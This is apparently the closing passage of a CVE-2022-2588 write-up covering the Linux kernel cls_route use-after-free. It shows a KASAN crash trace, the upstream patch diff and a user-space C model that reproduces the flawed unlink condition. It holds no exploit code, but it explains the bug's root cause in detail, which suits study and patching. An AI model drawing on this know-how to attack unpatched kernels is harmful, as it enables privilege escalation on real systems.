[ 3136.471680] R10: ffffed1001745a04 R11: 0000000000000001 R12: 92a000ea00000593
[ 3136.474156] R13: 0000000000000001 R14: ffff8881041b8540 R15: 0000000000000000
[ 3136.476624] FS: 0000000000000000(0000) GS:ffff888109b00000(0000) knlGS:0000000000000000
[ 3136.479227] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3136.481859] CR2: 0000564fe64f7650 CR3: 0000000106a8c000 CR4: 00000000000006e0
[ 3136.484757] Call Trace:
[ 3136.487477] <TASK>
[ 3136.490650] tcf_exts_destroy+0x2e/0x60
[ 3136.493054] route4_destroy+0x2ee/0x4d0 [cls_route]
[ 3136.495654] ? route4_init+0x60/0x60 [cls_route]
[ 3136.498213] ? __kasan_check_write+0x14/0x20
[ 3136.500784] ? mutex_unlock+0x81/0xd0
[ 3136.503186] tcf_proto_destroy+0x54/0x150
[ 3136.505625] tcf_proto_put+0x5b/0x80
[ 3136.508134] tcf_chain_flush+0xdf/0x150
[ 3136.510616] __tcf_block_put+0xea/0x1c0
[ 3136.513100] tcf_block_put+0xca/0x110
[ 3136.515600] ? tcf_block_put_ext+0x60/0x60
[ 3136.518110] htb_destroy+0xed/0x760 [sch_htb]
[ 3136.520595] ? rcu_exp_wait_wake+0x570/0x570
[ 3136.523096] ? htb_destroy_class_offload+0x830/0x830 [sch_htb]
[ 3136.525794] ? htb_reset+0x1dd/0x2a0 [sch_htb]
[ 3136.528551] ? qdisc_reset+0x1dd/0x280
[ 3136.531346] qdisc_destroy+0x63/0x150
[ 3136.534156] qdisc_put+0x6b/0x80
[ 3136.536581] dev_shutdown+0x129/0x180
[ 3136.539066] unregister_netdevice_many+0x4dd/0xc50
[ 3136.541621] ? __kasan_check_read+0x11/0x20
[ 3136.544207] ? dev_cpu_dead+0x400/0x400
[ 3136.546622] ? unregister_netdevice_many+0xc50/0xc50
[ 3136.549100] default_device_exit_batch+0x2df/0x370
[ 3136.551570] ? __dev_change_net_namespace+0xaf0/0xaf0
[ 3136.554065] ops_exit_list+0x92/0xa0
[ 3136.556520] cleanup_net+0x2f3/0x5e0
[ 3136.558804] ? unregister_pernet_device+0x60/0x60
[ 3136.561209] ? rtnl_unlock+0xe/0x20
[ 3136.563448] process_one_work+0x44f/0x740
[ 3136.565930] worker_thread+0x2bb/0x6f0
[ 3136.568190] ? process_one_work+0x740/0x740
[ 3136.570541] kthread+0x179/0x1b0
[ 3136.572620] ? kthread_complete_and_exit+0x30/0x30
[ 3136.574997] ret_from_fork+0x22/0x30
[ 3136.577103] </TASK>
[ 3136.578972] Modules linked in: cls_route sch_htb isofs binfmt_misc nls_iso8859_1 ppdev joydev input_leds parport_pc serio_raw mac_hid parporti
[ 3136.592765] ---[ end trace 0000000000000000 ]---
[ 3136.595224] RIP: 0010:tcf_action_destroy+0x85/0xd0
[ 3136.597666] Code: ff 48 83 c3 08 48 39 5d d0 74 55 48 89 df e8 f2 ed 31 ff 4c 8b 23 4d 85 e4 74 45 48 c7 03 00 00 00 00 4c 89 e7 e8 db ed 31 f
[ 3136.603930] RSP: 0018:ffff888102d0f6a8 EFLAGS: 00010296
[ 3136.606569] RAX: 0000000000000000 RBX: ffff888107ef9008 RCX: ffffffffa622a125
[ 3136.609403] RDX: 0000000000000000 RSI: 0000000000000008 RDI: 92a000ea00000593
[ 3136.612241] RBP: ffff888102d0f6d8 R08: 0000000000000001 R09: 0000000000000003
[ 3136.615034] R10: ffffed1001745a04 R11: 0000000000000001 R12: 92a000ea00000593
[ 3136.617558] R13: 0000000000000001 R14: ffff8881041b8540 R15: 0000000000000000
[ 3136.620093] FS: 0000000000000000(0000) GS:ffff888109b00000(0000) knlGS:0000000000000000
[ 3136.622819] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3136.625241] CR2: 0000564fe64f7650 CR3: 0000000106a8c000 CR4: 00000000000006e0
Patch #
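This vulnerability occurred because the unlink step checked not only that the fold pointer being freed is non-NULL but also that its handle is non-zero, so a filter with handle 0 was freed without being removed from the list. The patch therefore reduces the condition to a check on the fold pointer alone, as follows [12].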
diff --git a/net/sched/cls_route.c b/net/sched/cls_route.c
index a35ab8c27866..3f935cbbaff6 100644
--- a/net/sched/cls_route.c
+++ b/net/sched/cls_route.c
@@ -526,7 +526,7 @@ static int route4_change(struct net *net, struct sk_buff *in_skb,
 	rcu_assign_pointer(f->next, f1);
 	rcu_assign_pointer(*fp, f);
 
-	if (fold && fold->handle && f->handle != fold->handle) {
+	if (fold) {
 		th = to_hash(fold->handle);
 		h = from_hash(fold->handle >> 16);
 		b = rtnl_dereference(head->table[th]);
--
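The effect of this one-line change can be illustrated with a small user-space model. This is a sketch under simplifying assumptions, not the kernel implementation: a single linked list stands in for the bucket tables, a freed flag stands in for the deferred free of the old filter, and all toy_* names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for struct route4_filter: a handle and a link. */
struct toy_filter {
	uint32_t handle;
	struct toy_filter *next;
	bool freed;	/* set instead of calling free(), so the list stays inspectable */
};

/* Unlink victim from the singly linked list rooted at *head, if present. */
static void toy_unlink(struct toy_filter **head, struct toy_filter *victim)
{
	for (struct toy_filter **pp = head; *pp; pp = &(*pp)->next) {
		if (*pp == victim) {
			*pp = victim->next;
			return;
		}
	}
}

/* Replace fold with f. With patched == false the unlink condition is the
 * pre-patch one from the diff; with patched == true it is just "if (fold)". */
static void toy_change(struct toy_filter **head, struct toy_filter *f,
		       struct toy_filter *fold, bool patched)
{
	assert(f != NULL);

	f->next = *head;	/* insert the new filter at the front */
	*head = f;

	if (patched ? (fold != NULL)
		    : (fold && fold->handle && f->handle != fold->handle))
		toy_unlink(head, fold);

	if (fold)
		fold->freed = true;	/* models the unconditional free of the old filter */
}

/* Return true if a node still reachable from head has been "freed". */
static bool toy_has_dangling(const struct toy_filter *head)
{
	for (; head; head = head->next)
		if (head->freed)
			return true;
	return false;
}
```

With an old filter whose handle is 0 and patched set to false, toy_has_dangling reports that the list still reaches the freed node, which corresponds to the stale entry that route4_destroy later walks. With patched set to true, the old node is unlinked before it is marked freed.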
References #
- 0xCD4, "kernel-ctf-lab." github.com, Accessed: May. 26, 2026. [Online]. Available: https://github.com/0xCD4/kernel-ctf-lab
- "CVE-2022-2588 Detail." nvd.nist.gov, Accessed: May. 26, 2026. [Online]. Available: https://nvd.nist.gov/vuln/detail/cve-2022-2588
- Linus Torvalds et al., "Linux kernel", (Version 5.18) [Source Code]. https://github.com/torvalds/linux
- "netlink(7) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man7/netlink.7.html
- "rtnetlink(7) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man7/rtnetlink.7.html
- "Introduction to Netlink." docs.kernel.org, Accessed: May. 26, 2026. [Online]. Available: https://docs.kernel.org/userspace-api/netlink/intro.html
- moises-silva, "libnetlink examples." github.com, Accessed: May. 26, 2026. [Online]. Available: https://github.com/moises-silva/libnetlink-examples/tree/master
- iproute2, "This is a set of utilities for Linux networking." github.com, Accessed: May. 26, 2026. [Online]. Available: https://github.com/iproute2/iproute2
- "unshare(2) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man2/unshare.2.html
- "user_namespaces(7) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man7/user_namespaces.7.html
- "tc(8) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man8/tc.8.html
- "[PATCH] net_sched: cls_route: remove from list when handle is 0." lore.kernel.org, Accessed: May. 31, 2026. [Online]. Available: https://lore.kernel.org/netdev/20220809170518.164662-1-cascardo@canonical.com/T/#u